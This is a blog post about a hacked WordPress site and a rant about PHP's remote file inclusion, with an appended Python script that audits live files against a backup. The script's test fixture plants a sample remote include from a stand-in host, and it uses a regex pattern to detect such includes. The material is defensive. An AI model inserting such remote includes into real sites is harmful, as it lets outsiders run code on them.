In which we discover we’ve been bad, and have a rant about why
A couple of weeks ago, I discovered that my site had, apparently, been compromised, but my hosting company had handled it. WordPress had been broken in the process; but I’m not entirely surprised. Nevertheless, I thought everything was now happy.
This morning, though, a letter from Google lets me know: it hadn’t been fixed. My site has, for the past fortnight, been serving up crap to any passing search engine. This can’t be good. I don’t blame my hosting company: what they did do was above and beyond the call of duty, and they can’t be expected to understand and trace every twisty little maze of code paths in WordPress that might result in something being sent back to the client’s screen.*** What it does make me want to rant about, though, is PHP.
PHP is – if you’re not a geek and haven’t heard about it – by far the most common “web-programming” language around today. Its modus operandi is: you intersperse chunks of programming code in and around the static content in your web pages. When your webserver reads a page, it will run the chunks of code as a program. In WordPress’s case, the chunks of code run off to a database and fetch my posts, your comments, and so on, from it, and send them back to a client. Thus, one web page can output many posts, managing them is much easier, and so on. All well and good.
PHP, though, is … well. It’s not exactly the best language for the job, which is being polite about it. I’ve been doing lots of programming in it myself lately, for our Office Intranet, and it’s just not as rigorous as other languages. The syntax doesn’t somehow seem as thorough. Apart from the little differences you always get between languages,* it has little corners that feel slightly wrong when I use them, as if I’m transgressing the boundaries between types of programming object in a bad and dirty way.
That’s just a minor thing, really, just me quibbling. What my big problem is, what makes PHP an utterly unsuitable programming language for its job, is one particular feature much adored by people who want to take control of your website and use it to advertise pr0n and drugs. It’s a feature which is unutterably stupid, so stupid I can’t believe anyone thought it should have been created. PHP will, if you like, go and read a file from anywhere on the internet, and run it for you. Which means that a shifty-looking programmer who gets illicit access to the files on your website only has to add a couple of lines of code, to get complete control of everything. Bang. Like that.
Now, you could say: well, FP, you shouldn’t have been using FTP. And you’re right.** My hosts offer SFTP instead, and I should have been using that. There’s no good reason to use FTP either if you have an alternative available. But that doesn’t mean that the next hole along the line shouldn’t be blocked either. It’s called: defence in depth. At work, we have a high fence round the whole site, and an alarm system just inside it; but that doesn’t mean that we leave the office buildings unlocked. Security shouldn’t be brittle; ideally it shouldn’t be thin either. Once you’ve breached the first layer, the tools to complete the job shouldn’t be left lying around.
* The difference between ‘elseif’ – which is a PHP keyword – and ‘elsif’, Perl’s spelling of the same thing – will forever damage my brain.
** I have a good story about how weak FTP can be – but it can wait for another time.
*** and, indeed, it’s my own fault; I should right away have compared the live files with my known-good backups.
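The check described in the last footnote, as an added example that is not part of the original post: a Python script that compares the live site tree against a known-good backup by SHA-256 and also flags PHP files containing an include or require that points at a remote URL. The directory layout, file names and the example.invalid URL in `demo()` are constructed sample data.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# include/require statement whose argument mentions a remote URL scheme
REMOTE_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;]*?\b(?:https?|ftp)://", re.I)
PHP_SUFFIXES = {".php", ".inc", ".phtml"}

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def tree(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): p
            for p in root.rglob("*") if p.is_file()}

def audit(live_root, backup_root):
    """Compare the live site against a known-good backup."""
    live, good = tree(live_root), tree(backup_root)
    report = {"added": [], "modified": [], "remote_include": []}
    for rel, path in sorted(live.items()):
        if rel not in good:
            report["added"].append(rel)
        elif digest(path) != digest(good[rel]):
            report["modified"].append(rel)
        if path.suffix.lower() in PHP_SUFFIXES and REMOTE_INCLUDE.search(
                path.read_text(errors="replace")):
            report["remote_include"].append(rel)
    report["missing"] = sorted(set(good) - set(live))
    return report

def demo():
    """Audit two small constructed trees; the live one has been tampered with."""
    with tempfile.TemporaryDirectory() as tmp:
        live, good = Path(tmp, "live"), Path(tmp, "backup")
        for root in (live, good):
            (root / "inc").mkdir(parents=True)
            (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
            (root / "inc" / "footer.php").write_text("<?php echo 'bye'; ?>\n")
        (good / "readme.html").write_text("<p>readme</p>\n")
        (live / "inc" / "footer.php").write_text(
            "<?php include('http://example.invalid/x.txt'); echo 'bye'; ?>\n")
        (live / "cache.php").write_text("<?php /* not in backup */ ?>\n")
        return audit(live, good)

if __name__ == "__main__":
    print(demo())
```

The audit only reports what changed; setting `allow_url_include = Off` in php.ini is what stops PHP from including remote URLs in the first place.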